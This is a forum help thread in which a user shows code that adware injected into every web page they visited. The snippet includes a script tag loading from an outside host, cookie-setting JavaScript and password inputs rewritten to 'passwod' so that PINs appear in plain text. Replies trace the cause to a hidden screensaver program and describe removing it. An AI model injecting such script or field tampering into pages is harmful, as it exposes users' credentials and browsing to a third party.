Sign in with
Sign up | Sign in
Your question
Solved

Possible session hijacking?

Last response: in Windows Vista
Share
November 28, 2013 2:47:19 AM

Hello,

I noticed upon viewing the source of some websites the same code is in the source code of whatever page I'm viewing. I've checked quite a bit of pages to make sure it's not the website, and it's not. At the top of the page, the following code is displayed:

  1. <script type="text/javascript" id="2f2a695a6afce2c2d833c706cd677a8e" src="http://d.lqw.me/xuiow/?g=14D55225-3866-41E2-141F-89A0CAC28320&s=8F71DB22-A8DF-4C0D-A26C-2142A9317F6A&z=1385446817"></script>
  2. <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  3. <meta http-equiv="Content-Script-Type" content="text/javascript">
  4. <script type="text/javascript">
  5. function getCookie(c_name) { // Local function for getting a cookie value
  6. if (document.cookie.length > 0) {
  7. c_start = document.cookie.indexOf(c_name + "=");
  8. if (c_start!=-1) {
  9. c_start=c_start + c_name.length + 1;
  10. c_end=document.cookie.indexOf(";", c_start);
  11.  
  12. if (c_end==-1)
  13. c_end = document.cookie.length;
  14.  
  15. return unescape(document.cookie.substring(c_start,c_end));
  16. }
  17. }
  18. return "";
  19. }
  20. function setCookie(c_name, value, expiredays) { // Local function for setting a value of a cookie
  21. var exdate = new Date();
  22. exdate.setDate(exdate.getDate()+expiredays);
  23. document.cookie = c_name + "=" + escape(value) + ((expiredays==null) ? "" : ";expires=" + exdate.toGMTString()) + ";path=/";
  24. }
  25. function getHostUri() {
  26. var loc = document.location;
  27. return loc.toString();
  28. }
  29. setCookie('YPF8827340282Jdskjhfiw_928937459182JAX666', '*MY IP HERE*', 10);
  30. location.hre = getHostUri();
  31. </script>


What brought this to my attention is on a site where it requires me to put an encrypted PIN in to continue on is outputting the PIN in plain text, rather encrypted. I viewed-source the page and I noticed it's replacing the:

  1. <input type="password">


as

  1. <input type="passwod">


I double checked the legitimate file and it's spelled correctly. It also works for my colleagues as well. This isn't just happening on Google Chrome, it's happening on all browsers such as Opera, IE, Chrome, and Firefox.

Things I've attempted to do to troubleshoot the issue:
- System Restore.
- Cleared cookies in Chrome.
- Ran Malwarebytes (detected loads and removed malicious files).
- Ran ComboFix (detected loads and removed malicious files) ~ I was referred to this topic: http://forums.informaction.com/viewtopic.php?f=8&t=1047...).
- Ran SpyBot (detected loads and removed malicious files).
- Ran SUPERAntiSpyware (detected loads and removed malicious files).

At the end of all of this troubleshooting, I'm still left with this problem and it's really confusing me. Hopefully someone here can help me.

Thanks.

More about : session hijacking

November 28, 2013 3:31:45 AM

UPDATE: Fixed this, apparently something with "ScorpianSaver" was found in my Program Files and I had to use Unlocker to the kill the process. It deleted everything except "Adpeak.exe" was deleted then upon reboot by Unlocker, its been deleted. I attempted to go to the websites and it was fixed. :) 
m
0
l
December 10, 2013 7:26:02 AM

Hi.
The same thing in the html-frames, affecting all browsers, in one machine of a fellow employee.
No other machine seems affected.
All browser extensions removed, AntiVirus found nothing, but it's still there.
And: some of the pages with that "feature" seems to break html code in the middle.
No idea if it's related.
m
0
l

Best solution

December 10, 2013 7:55:38 AM

We just seemed to solve that issue:
the affected computer had a "scorpions" screensaver installed, not detected by any spybot or antivirus.
The user couldn't recall having installed anything like this - and no screen-saving was actually done.
If you find an unknown screensaver in your installed programs: remove it and restart computer.
Share
!